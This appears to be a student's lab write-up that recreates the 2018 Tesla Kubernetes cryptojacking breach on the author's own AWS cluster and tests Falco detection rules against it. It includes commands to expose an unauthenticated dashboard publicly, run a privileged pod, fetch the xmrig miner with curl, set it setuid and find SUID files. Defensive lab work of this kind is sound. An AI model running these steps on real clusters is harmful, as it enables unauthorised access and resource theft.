As part of this task I was required to map the Tesla Data Breach to the MITRE ATT&CK framework. From here I select any 2 specific ‘techniques’ from the incident and replicate both on a ‘proof of concept’ basis. This will allow me to display my understanding by synthesizing the selected technical techniques.
Falco Detection Rule | Description | Event Source | MITRE ATT&CK Tactic |
---|---|---|---|
Terminal Shell in Container | A shell was used as the entrypoint/exec point into a container with an attached terminal. | Host System Calls | Execution |
Detect crypto miners using the Stratum protocol | Miners typically specify the mining pool to connect to with a URI that begins with stratum+tcp | Host System Calls | Execution, Command & Control |
Detect outbound connections to common miner pool ports | Miners typically connect to mining pools on common ports. | Host System Calls | Execution, Command & Control |
Mining Binary Detected | Malicious script or binary detected within pod or host. This rule will be triggered by the execve syscall | Host System Calls | Persistence |
List AWS S3 Buckets | Detect listing of all S3 buckets. In the case of Tesla, those buckets contained sensitive data such as passwords, tokens and telemetry data. | AWS Cloudtrail Audit Logs | Credential Access |
Contact EC2 Instance Metadata Service From Container | Detect listing of all S3 buckets. In the case of Tesla, those buckets contained sensitive data such as passwords, tokens and telemetry data. | Host System Calls | Lateral Movement |
Had to setup an AWS-CLI Profile
in order to interact with AWS services via my local workstation
aws configure --profile nigel-aws-profile
export AWS_PROFILE=nigel-aws-profile
aws sts get-caller-identity --profile nigel-aws-profile
aws eks update-kubeconfig --region eu-west-1 --name tesla-cluster
Once I had AWS-CLI installed, I created a 1 node, AWS EKS cluster
using EKSCTL CLI tool.
Notice how I use the date
command purely to confirm when those actions were enforced.
date
eksctl create cluster tesla-cluster --node-type t3.xlarge --nodes=1 --nodes-min=0 --nodes-max=3 --max-pods-per-node 58
Once the cluster is successfully spun-up, I can scale it down to zero nodes
to bring my compute costs in the cloud down to $0 until I'm ready to do actual work.
date
eksctl get cluster
eksctl get nodegroup --cluster tesla-cluster
eksctl scale nodegroup --cluster tesla-cluster --name ng-64004793 --nodes 0
![Screenshot 2023-10-29 at 12 02 04](https://private-user-images.githubusercontent.com/126002808/278869188-a9d689b7-bb67-4f4a-a1c7-2e0a5c63e806.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4ODY5MTg4LWE5ZDY4OWI3LWJiNjctNGY0YS1hMWM3LTJlMGE1YzYzZTgwNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jOGM0M2M1M2E5NDdlMjhkMjU4ZTVjMDYwNTlmMjYzYzMxNGFiYjAzZDhjNjNhNDJjMWEyMmFlNGU5ZTI2YzgyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ut1tK_rVJqf8-0bsSycEXAIxz86KdA0fN5ePgEoYIrg)
Kubernetes Dashboard is a general purpose, web-based UI for Kubernetes clusters.
It allows users to manage applications running in the cluster and troubleshoot them, as well as manage the cluster itself.
When Kubernetes dashboard is installed using the recommended settings, both authentication
and HTTPS
are enabled. Sometimes, organizations like Tesla choose to disable authentication or HTTPS.
For example, if Kubernetes dashboard is served behind a proxy, then it's unnecessary to enable authentication when the proxy has its own authentication enabled.
Kubernetes dashboard uses auto-generated certificates for HTTPS, which may cause problems for HTTP client to access.
The below YAML
manifest is pre-packaged to provide an insecure dashboard with disable authentication and disabled HTTP/s.
kubectl apply -f https://vividcode.io/content/insecure-kubernetes-dashboard.yml
Still experiencing issues exposing the dashboard via port forwarding:
kubectl port-forward svc/kubernetes-dashboard -n kubernetes-dashboard 8443 --insecure-skip-tls-verify
The above manifest is a modified version of the deployment of Kubernetes dashboard which has removed the argument --auto-generate-certificates
and has added some extra arguments:
--enable-skip-login
--disable-settings-authorizer
--enable-insecure-login
--insecure-bind-address=0.0.0.0
![Screenshot 2023-10-21 at 12 41 45](https://private-user-images.githubusercontent.com/126002808/277105972-e2e3ec87-52fc-4799-aec8-c2e733d1e490.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA1OTcyLWUyZTNlYzg3LTUyZmMtNDc5OS1hZWM4LWMyZTczM2QxZTQ5MC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iNWNmYjI2MDBiZjMxMzZhNmQ1ZTY0MjgxOTRiODNhNDExNTRiMTJiNTI4NzlhMmI1NjllNjQ3MGZkMTRiNmQ2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9HIVgaR32D_aCovlgPtznODa-SmJBjjd3Fj8W58fUis)
After this change, Kubernetes dashboard server now starts on port 9090 for HTTP
.
It has also modified the livenessProbe
to use HTTP as the scheme and 9090 as the port.
This proxy
command starts a proxy to the Kubernetes API server, and the dashboard should be accessible at
http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/.
![Screenshot 2023-10-21 at 12 49 34](https://private-user-images.githubusercontent.com/126002808/277106267-f10d9bbc-999d-49df-9766-e917b2c36716.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA2MjY3LWYxMGQ5YmJjLTk5OWQtNDlkZi05NzY2LWU5MTdiMmMzNjcxNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZjgwOWU4Mzg3MTY5OGIwZjc4N2I0NjlkMDhmOWI0YzhjOThiYWIyZTMwMzRlMTVkZTU1NDQ1M2EwYjIxYzkwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.OjcRCqE6XWvLknZGFynZbcERGk8n1C3ZRjCB8doiLsI)
However, I received the below error at proxy address:
"message": "no endpoints available for service \"https:kubernetes-dashboard:\""
![Screenshot 2023-10-21 at 12 48 29](https://private-user-images.githubusercontent.com/126002808/277106613-06cfc246-5c1f-4d31-9e1b-380ce5231156.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA2NjEzLTA2Y2ZjMjQ2LTVjMWYtNGQzMS05ZTFiLTM4MGNlNTIzMTE1Ni5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lYTMzMzM2NWQ5ZTE2NTU0NGJhZTNhMTA3NzVjNTMzNGY4ZDUyYTRlNmQ0MmRmOGIwMGVmYjE1N2U1ZmJlMWI0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.W4q96p8ahGNHHAX1Qs27zTDG78zqJ0SyCZgJm2V8xYM)
Port 9090 is added as the containerPort
. Similarly, the Kubernetes Service abstraction for the dashboard opens port 80 and uses 9090 as the target port
. Accessing the dashboard at http://localhost:8001/
shows all associated paths, and its quite easy to obfuscate credentials from these paths:
![Screenshot 2023-10-21 at 12 58 57](https://private-user-images.githubusercontent.com/126002808/277106794-0e7847ce-3d39-42f5-a0f9-9d7999bb56d7.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA2Nzk0LTBlNzg0N2NlLTNkMzktNDJmNS1hMGY5LTlkNzk5OWJiNTZkNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wMDIwNGY4NDUwNmM0ZjJmODc5OGQ3ZDJhNTg1Nzk1YmM3MTM2MjQwMTI3YjFjMTZlZDgwYjcwY2JhOTE3NTdiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2tgtA5wyXj3XKpeDmjDKfjasqLqhimwX-aZRI-ueEXI)
We can even see the underlying EC2 instance associated with the Kubernetes cluster. The EU-West-1
denotes the AWS Region (Ireland) I've installed the EC2 instance, and the IP address of the VM is also present in the name:
![Screenshot 2023-10-21 at 13 02 09](https://private-user-images.githubusercontent.com/126002808/277106946-614a26d5-a834-4a72-a6a9-b9855e4efa31.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA2OTQ2LTYxNGEyNmQ1LWE4MzQtNGE3Mi1hNmE5LWI5ODU1ZTRlZmEzMS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNWIxNzc0MGFkMTNiZDM5MTRhMGM5Y2FkNGNkNDEwZjc4ZTU4NTAyOTM5NDA5MjJlMmU0Y2JiNmI3MWMxNGY3JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.e57JdVk_DDfaMKG7wgZUhB8RlLXHzGNMzE9GIrnzK20)
The IP address in the previous OIDC screenshot does not match the private IP of my EC2 instance on AWS
I will come back to this later to understand how that OIDC address is used for single sign-on:
![Screenshot 2023-10-21 at 13 07 53](https://private-user-images.githubusercontent.com/126002808/277107235-a1aa21a2-3e7f-426c-a206-f850a85733bd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA3MjM1LWExYWEyMWEyLTNlN2YtNDI2Yy1hMjA2LWY4NTBhODU3MzNiZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jY2I4OGNlODc5ZDQ4M2M1NzUwYzNlZjg1OWRjOTViM2FhODVkZWE2MDM4ZjQwYTA2ZjNiNzdkYTdlZDI0OWExJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.u5ulEUIvd5fGMi0maHlZC1JGVuIWK0bx37rGOEVkzyU)
Either way, I modified the original deployment script to make sure the Kubernetes Deployment uses a LoadBalancer
service.
This way, AWS automatically assigns the public IP address for the dashboard service. Allowing it to be accessed publically:
kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/public-dashboard.yaml
![Screenshot 2023-10-21 at 13 23 54](https://private-user-images.githubusercontent.com/126002808/277107841-8013ee39-1b8e-4147-8179-1e84f590db89.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA3ODQxLTgwMTNlZTM5LTFiOGUtNDE0Ny04MTc5LTFlODRmNTkwZGI4OS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT04MWM4YjY4ZjM4NWU3MTQxNjllYzExYTBkNWFkYWI1YjhjYWFlN2RiNDNhZThiN2U5ZTFlYjQ2N2MzZmU1MDI5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.jrOMo7BshL-2GG3b0r9UfO9AuQExshzSztJrG6uIaGI)
Proof that the L7 LB service was created in AWS automatically
However, there seems to be some health issues preventing me from accessing the dashboard.
![Screenshot 2023-10-21 at 13 36 52](https://private-user-images.githubusercontent.com/126002808/277108432-73b8c33f-c7da-4fc3-a2ff-040a7d083453.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA4NDMyLTczYjhjMzNmLWM3ZGEtNGZjMy1hMmZmLTA0MGE3ZDA4MzQ1My5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03ODFkYTIwYjMzZGMwNzliODJjNWZmYWJhOTg4Yjc1NjYyOTU3ZWQ4YjM2OTI5ZjAwZjdmMWFhNTBhYzZlZjQ0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Pz3EM-tOB83dEaTnAkZPpVIO5y7fcmmVHuRSEuXfa9Q)
After you have done this, when Kubernetes dashboard is opened, you can click Skip
in the login page to skip authentication and go to the dashboard directly.
![kubernetes_dashboard_skip](https://private-user-images.githubusercontent.com/126002808/277037437-ba26d2c0-304e-49d7-86d9-64b8a368b05e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MDM3NDM3LWJhMjZkMmMwLTMwNGUtNDlkNy04NmQ5LTY0YjhhMzY4YjA1ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03NTM4MDYzYjUwYjVmNWQ4NGRhODI3NjgyODQ1MzkyNTVhZTcxYTE4NzNmZTU5NTQ3OWMzYmQ4MjQ2MTM3YzYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.kyYcJ-CGg9hw4FrAzt0G8c7vvu2Kng3XaRp-RL1JONM)
- Kubernetes Web UI Activation without Authentication
- Skipping login to allows users to have unrestricted access
- Bypassing authentication for the local Kubernetes Cluster Dashboard
Installed Falco via Helm
using the --set tty=true
feature flag to ensure events are handled in real-time.
By default, only the stable
rules are loaded by Falco, you can install the sandbox
or incubating
rules by referencing them in the Helm chart:
https://falco.org/docs/reference/rules/default-rules/
Remove the existing Falco installation with stable rules:
helm uninstall falco -n falco
Install Falco again with the modified falco-sandbox_rules.yaml
referenced from my own Github repository:
https://github.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/blob/main/rules/falco-sandbox_rules.yaml
I'm enabling the ```incubation``` and ```sandbox``` rules for the purpose of this assignment:
helm install falco -f mitre_rules.yaml falcosecurity/falco --namespace falco \
--create-namespace \
--set tty=true \
--set auditLog.enabled=true \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set collectors.kubernetes.enabled=true \
--set falcosidekick.webui.redis.storageEnabled=false \
--set "falcoctl.config.artifact.install.refs={falco-incubating-rules:2,falco-sandbox-rules:2}" \
--set "falcoctl.config.artifact.follow.refs={falco-incubating-rules:2,falco-sandbox-rules:2}" \
--set "falco.rules_file={/etc/falco/falco-incubating_rules.yaml,/etc/falco/falco-sandbox_rules.yaml}"
kubectl get pods -n falco -o wide
![Screenshot 2023-11-03 at 16 47 25](https://private-user-images.githubusercontent.com/126002808/280358235-efff769d-a034-4a37-a729-d9f61c9ea74f.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgwMzU4MjM1LWVmZmY3NjlkLWEwMzQtNGEzNy1hNzI5LWQ5ZjYxYzllYTc0Zi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wODYxYjhlMWNiNmM5MTkxNmE4YzRkMWY2NTkwMGMyZGQ1MmU5YmYyYTdkYzRmMDI0MjJmOGYyNTQ1OWE0MTVjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ddAaPveSrqgmaI2nHPp9sfKAhM5Vbz4SW9KeTcZk0Ss)
- Where the option
falcoctl.config.artifact.install.refs
governs which rules are downloaded at startup falcoctl.config.artifact.follow.refs
identifies which rules are automatically updated andfalco.rules_file
indicates which rules are loaded by the engine.
Alternatively, I can just edit the ConfigMap manually (and this might be easier in the end):
kubectl edit cm falco-rules -n falco
I can inject Custom Rules
via the working-rules.yaml
manifest:
I successfully deployed Falco and the associated dashboard
As seen in the below screenshot, it may go through some crash status changes before running correctly (expected due to lack of priority set):
![Screenshot 2023-10-27 at 11 43 33](https://private-user-images.githubusercontent.com/126002808/278619383-91fa6653-3e9c-4b2c-8263-bf12a78d61f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjE5MzgzLTkxZmE2NjUzLTNlOWMtNGIyYy04MjYzLWJmMTJhNzhkNjFmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zMDJhMzg3YzIxZjdmMTFiZDkzYmNhNzA2NGE2MjVjNjU0MzdiMTkzOTg2NTMzYmZhODU4OTZiNGY1OWNmZDg1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.dIQyq4WCirB4bSNudIdJcDyhb49O2qbm8qo5Xaxw-YQ)
Finally, Port-Foward the Falco Sidekick from Macbook
kubectl port-forward svc/falco-falcosidekick-ui -n falco 2802 --insecure-skip-tls-verify
Forwarding from 127.0.0.1:2802 -> 2802 Forwarding from [::1]:2802 -> 2802 Handling connection for 2802
![Screenshot 2023-10-27 at 11 56 17](https://private-user-images.githubusercontent.com/126002808/278621682-eaaace2f-2aaf-4c8c-bd1e-9862ea5b7213.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjIxNjgyLWVhYWFjZTJmLTJhYWYtNGM4Yy1iZDFlLTk4NjJlYTViNzIxMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lYWMyZWEzODQzNTA3NWU5ZmIzNTlhY2Q2YmI5MGYxMTYzZGQ5MjU3YmY3MzY2NTJkNjdhZjFkZjdmODg0ZGQxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ZruuyYBnQ-Qx9CyAUQuixwEAUpg8iibp3rVpFKhSHqw)
Create an insecure containerized workload with privileged=true
to give unrestricted permissions for the miner:
kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/tesla-app.yaml
Shell into the newly, over-privileged workload:
kubectl exec -it tesla-app -- bash
![Screenshot 2023-10-27 at 12 02 09](https://private-user-images.githubusercontent.com/126002808/278622990-ceb56366-359d-4af7-9f3a-c81d2e8485aa.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjIyOTkwLWNlYjU2MzY2LTM1OWQtNGFmNy05ZjNhLWM4MWQyZTg0ODVhYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZjIyMjkxMzJhYmYyNWNiM2M5YjNlMDhjYWZjYTY4MDYzMDg0YjQ2YjE1OWY3YTllMGFiNmQ4MzU0YTNhODY4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.FIcNZ53ePwNdcGeFUFEzVKhrkfzsZMkJG_8ex9wXf-Q)
To test the IDS/SOC tool, I peform one insecure behaviour in tab1
while also check for the Falco log event in tab2
:
kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'tesla-app'
![Screenshot 2023-10-22 at 13 54 45](https://private-user-images.githubusercontent.com/126002808/277165986-53c5f3b3-d4c7-4570-b17e-3b1737fc9441.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTY1OTg2LTUzYzVmM2IzLWQ0YzctNDU3MC1iMTdlLTNiMTczN2ZjOTQ0MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mODUwZDVmM2JiZjlmNDY1ZGRkZjljMjgxNWFhNzA1NzBiZWNmMThjNDJlNWUxZTE1NDI2OGNmZjRhZTE0MWVjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EFaW9SFdwS1xUisPDo7YIHMmTe1IM2lfFwEVi69D7Qc)
If you look at the above screenshot, we created a new workload called tesla-app
, I've terminal shelled into the workload, and I've the real-time live tail of security incidents showing in terminal 2 window - providing the IDS system works.
To enable Kubernetes audit logs, you need to change the arguments to the kube-apiserver
process to add --audit-policy-file
and --audit-webhook-config-file
arguments and provide files that implement an audit policy/webhook configuration.
Below is a step-by-step guide will show you how to configure kubernetes audit logs on minikube and deploy Falco.
Managed Kubernetes providers, like AWS EKS, usually provide a mechanism to configure the audit system.
https://falco.org/docs/install-operate/third-party/learning/
kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/tesla-app.yaml
The adversaries would have terminal shelled into the above workload in order to install the cryptominer.
kubectl exec -it tesla-app -- bash
Download the xmrig
mining package from the official Github project:
curl -OL https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-linux-static-x64.tar.gz
Unzipping the mining binary package
tar -xvf xmrig-6.16.4-linux-static-x64.tar.gz
Changing directory to the newly-downloaded miner folder
cd xmrig-6.16.4
Elevating permissions
chmod u+s xmrig
find / -perm /6000 -type f
Tested - and works!
